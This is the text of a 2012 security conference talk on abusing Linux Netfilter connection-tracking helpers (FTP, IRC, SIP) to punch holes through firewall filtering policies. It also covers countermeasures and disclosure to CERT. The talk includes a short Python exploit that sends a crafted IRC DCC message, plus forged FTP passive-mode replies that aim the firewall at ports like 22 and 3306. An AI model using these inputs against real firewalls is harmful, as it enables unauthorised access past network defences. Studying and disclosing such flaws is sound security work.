Conntrack Attack
filtering policy
Éric Leblond
OISF
Cansecwest 2012
1 / 44
French
Network security expert
Free Software enthusiast
NuFW project creator (Now ufwi), EdenWall co-founder
Netfilter developer:
Ulogd2: Netfilter logging daemon
Misc contributions:
NFQUEUE library and associates
Source NAT randomisation (defeat Kaminsky's DNS attack)
Currently:
Independent security consultant
Suricata IDS/IPS funded developer
Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers
Attack description
Conditions and principles
FTP case
Other protocols
Conclusion
Netfilter
Definition
Packet filtering framework inside the Linux 2.4.x to 3.x kernel series.
Features
Stateful and stateless packet filtering (IPv4 and IPv6).
Network address and port translation.
Multiple layers of APIs for 3rd party extensions.
Iptables
Command line utility to operate on rules.
It has access to all Netfilter features.
Two utilities: iptables for IPv4, ip6tables for IPv6.
iptables -A FORWARD -p tcp --syn --dport 80 \
    -m connlimit --connlimit-above 2 -j REJECT
Éric Leblond (OISF)
Tcpdump
Logged into ftp.lip6.fr.
ncftp / > ls
etc/
jussieu/
lip6/
Protocol
C: PASV
S: 227 Entering Passive Mode (195,83,118,1,199,211)
C: MLSD
S: 150 Opening ASCII mode data connection for MLSD.
S: 226 MLSD complete.
C: QUIT
Netfilter
# conntrack -E expect
[NEW] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=51155
[DESTROY] 300 proto=6 src=10.62.101.203 dst=195.83.118.1 sport=0 dport=51155
pptp
proto_gre
proto_udplite
sip
broadcast
h323
ipv6
netbios_ns
proto_dccp
proto_sctp
sane
snmp
Expectations in Netfilter
The expectation table
Expectations are stored in a dedicated table, similar to the conntrack table.
Only one tuple is used (the one of the expected connection; sport=0 in the conntrack output above is left open).
A short timeout is attached to each entry (300 seconds in the output above).
Do I use helpers?
What happens if I load a helper?
Can a user send crafted messages and go freely through the firewall?
Do helpers turn my firewall into an open bar?
A study is needed.
Let's look at the helpers.
Degree of freedom in Netfilter helpers
(Table columns as extracted, one row per helper and option value; the row labels naming the helpers are missing.)
Source: Fixed, Full, Fixed, Full, Fixed, Full
Destination: In CMD, In CMD, Fixed, Fixed, Fixed, In CMD
Port Dest: In CMD (every row)
Option: loose = 1 (dflt), loose = 0, sip_direct_signalling = 1 (dflt), sip_direct_signalling = 0
Legend:
Fixed: Value comes from the signalling connection. It can't be forged.
In CMD: The value comes from protocol message parsing and can be forged.
Full: Freedom is total. All values are accepted.
Global analysis
Sane defaults
Dangerous extensions of protocols have been disabled.
If we consider an attack by a client on a server:
It is impossible to open arbitrary connections to the server.
The level of security is acceptable.
FTP analysis
IRC analysis
The DCC command
The DCC command enables a transfer between end-points.
It is impossible to know the source address.
The destination port is fixed by the client.
Consequences
Allowing DCC thus allows the client to enable arbitrary connections to its IP.
The client computer is given complete freedom to open connections.
A mistake is simply another way of doing things.
(Katharine Graham)
Exploit code
import socket

def ipnumber(ip):
    # Dotted-quad IPv4 address to the integer form used in DCC messages
    ip = ip.rstrip().split(".")
    ipn = 0
    while ip:
        ipn = (ipn << 8) + int(ip.pop(0))
    return ipn

host = "irc.freenode.net"
dport = 6667  # IRC port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, dport))
ip = "192.168.1.129"  # Local address of client
port = 6000  # Port to open on Internet
# The helper parses the DCC request as it crosses the firewall;
# no NICK/USER registration with the IRC server takes place here.
atmsg = "PRIVMSG opensvp :\x01DCC CHAT CHAT %d %d\x01\r\n" \
    % (ipnumber(ip), port)
s.send(atmsg.encode())  # str -> bytes for Python 3
s.close()
Video
Let's connect from the Internet to port 6000 of a NATed client.
More information
See http://home.regit.org/netfilter-en/secure-use-of-helpers/
Known attacks
Cisco Bug ID CSCdr09226
Goal: open a pinhole in the firewall.
Force the server to generate a message interpreted as a command by the firewall.
An error condition can be used to trigger the abnormal behaviour.
https://listserv.icsalabs.com/pipermail/firewall-wizards/2000-March/008385.html
Objective
Our study of helpers has shown that a client cannot bypass the policy out of the box:
Client capabilities are always limited.
Dangerous extensions have been blocked.
Basic idea
Attack description
IPv4 case
To ask a client to connect to 192.168.2.2 on port 3306:
227 Entering Passive Mode (192,168,2,2,12,234)\r\n
IPv6 case
To ask a client to connect on port 3306:
229 Extended Passive Mode OK (|||3306|)\r\n
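Worked model of the two helpers discussed so far: the FTP expectation shown by conntrack -E expect, the 227/229 replies on this slide, and the DCC case from the IRC analysis. This is an added example written for this page; it is not the kernel's nf_conntrack_ftp or nf_conntrack_irc code and not the author's opensvp script. It mimics only the parsing and the "Fixed / In CMD / Full" rules of the degree-of-freedom table: the loose option is modelled as a function argument, and the IRC address check is modelled against the client's internal address only (the kernel also accepts the NATed address). The lip6 addresses and reply come from the page; the forged replies are constructed for the demo.

```python
"""Model of how the Netfilter FTP and IRC helpers turn a control-channel
message into an expectation (added example, not kernel code)."""
import re
from dataclasses import dataclass
from typing import Optional

PASV_RE = re.compile(r"^227 .*\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
EPSV_RE = re.compile(r"^229 .*\(\|\|\|(\d+)\|\)")
DCC_RE = re.compile(r"\x01DCC (?:CHAT|SEND) \S+ (\d+) (\d+)")


@dataclass(frozen=True)
class Expectation:
    """One tuple plus a timeout, as shown by 'conntrack -E expect'.
    src=None and sport=0 are wildcards (any value matches)."""
    proto: int
    src: Optional[str]
    dst: str
    sport: int
    dport: int
    timeout: int = 300


def parse_passive_reply(line):
    """(address or None, port) from a 227 or 229 server reply, else None."""
    m = PASV_RE.match(line)
    if m:
        a, b, c, d, p1, p2 = (int(x) for x in m.groups())
        if max(a, b, c, d, p1, p2) > 255:
            return None
        return f"{a}.{b}.{c}.{d}", (p1 << 8) | p2
    m = EPSV_RE.match(line)
    if m and 0 < int(m.group(1)) < 65536:
        return None, int(m.group(1))
    return None


def ftp_expectation(client, server, reply, loose=True):
    """Expectation the FTP helper registers for a passive-mode reply.

    loose=True (module default): the destination is taken from the reply
    ("In CMD").  loose=False: it must be the server's own address ("Fixed").
    The port comes from the reply with either setting, which is what the
    port-21-only policy bypass relies on."""
    parsed = parse_passive_reply(reply)
    if parsed is None:
        return None
    addr, port = parsed
    if addr is None:              # EPSV carries no address: use the sender's
        addr = server
    elif addr != server and not loose:
        return None               # loose=0 drops a forged destination address
    return Expectation(6, client, addr, 0, port)


def dcc_to_ip(n):
    """Inverse of the exploit's ipnumber(): integer -> dotted quad."""
    return ".".join(str((n >> s) & 0xFF) for s in (24, 16, 8, 0))


def irc_expectation(client, message):
    """Expectation the IRC helper registers for a client's DCC request.

    Destination is always the client's own address ("Fixed"): a DCC naming
    another address is refused (modelled on the internal address only).
    Source is left open ("Full"); the port comes from the message ("In CMD")."""
    m = DCC_RE.search(message)
    if m is None:
        return None
    addr, port = dcc_to_ip(int(m.group(1))), int(m.group(2))
    if addr != client or not 0 < port < 65536:
        return None
    return Expectation(6, None, client, 0, port)


def matches(exp, proto, src, dst, sport, dport):
    """Does a new packet hit the expectation?  Wildcards: src=None, sport=0."""
    return (proto == exp.proto and dst == exp.dst and dport == exp.dport
            and (exp.src is None or src == exp.src)
            and (exp.sport == 0 or sport == exp.sport))


if __name__ == "__main__":
    client, server = "10.62.101.203", "195.83.118.1"   # addresses from the page
    print(ftp_expectation(client, server,
          "227 Entering Passive Mode (195,83,118,1,199,211)\r\n"))
    forged = "227 Entering Passive Mode (192,168,2,2,12,234)\r\n"  # constructed
    print(ftp_expectation(client, server, forged), ftp_expectation(client, server, forged, loose=False))
    # loose=0 still lets a hostile server name port 22 on itself:
    print(ftp_expectation(client, server, "227 Entering Passive Mode (195,83,118,1,0,22)\r\n", loose=False))
    print(irc_expectation("192.168.1.129", "PRIVMSG opensvp :\x01DCC CHAT CHAT 3232235905 6000\x01\r\n"))
```

Running it reproduces the lip6 expectation (dport=51155, as in the conntrack output), shows that loose=0 refuses the 192.168.2.2 destination but still accepts a reply naming port 22 on the server itself, which is the bypass the demonstration relies on, and shows the DCC case opening any source towards the client's own address.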
Demonstration on Netfilter
Video
Let's take a firewall with a filtering policy allowing only port 21, and open a connection to port 22 on an FTP server.
Policy violation
Counter-measures
Other protocols
IRC
As discussed before, the IRC helper gives the client great power.
The issue is inverted: can we act against the client?
The same technique applies under the following conditions:
Attacker and client are separated by the firewall.
Attacker is on a network directly connected to the firewall.
IRC traffic can be sniffed by the attacker (MITM or server).
SIP
The server sends port parameters in a similar way to FTP.
The same attack is possible.
Only the content has to be changed.
Wait
Checkpoint setup
Used software
Demonstration version.
Minimal features installed.
Default installation.
Let's build a filtering policy with a single rule allowing FTP.
35 / 44
Demonstration setup
Lets do a filtering policy with a single FTP allowed rule ;
35 / 44
Demonstration
Video
36 / 44
Demonstration
Video
Let's take a firewall with a filtering policy allowing only port 21, and open a connection to port 22 on an FTP server.
Policy violation
There is no problem
Basic requirement
Choose your contractor well: the security level depends on their skills.
Other products
A generic attack
The attack may impact other firewall brands using ALGs.
Many of these firewalls remain untested:
Netfilter-based firewalls,
Iptables frontends,
Firewalls using ALGs.
Testing
Easy to do with the opensvp script.
Contact me if you are interested in using it.
Possible help
Contact CERT
If you get no response, send them a second e-mail.
Try to contact CERT Luxembourg, CERT Finland.
Microsoft Vulnerability Research (MSVR) is an alternative to CERT.
Questions
Do you have any questions?
Thanks to
Pablo Neira, Patrick McHardy: kernel developers can be friendly.
Sebastien Tricaud, Alexandre Dulaunoy: for their help and because APT can be fun.
More information
My blog: http://home.regit.org
Secure use of Iptables and connection tracking helpers:
http://home.regit.org/netfilter-en/secure-use-of-helpers/
Contact me
E-mail: [email protected]
Twitter: @Regiteric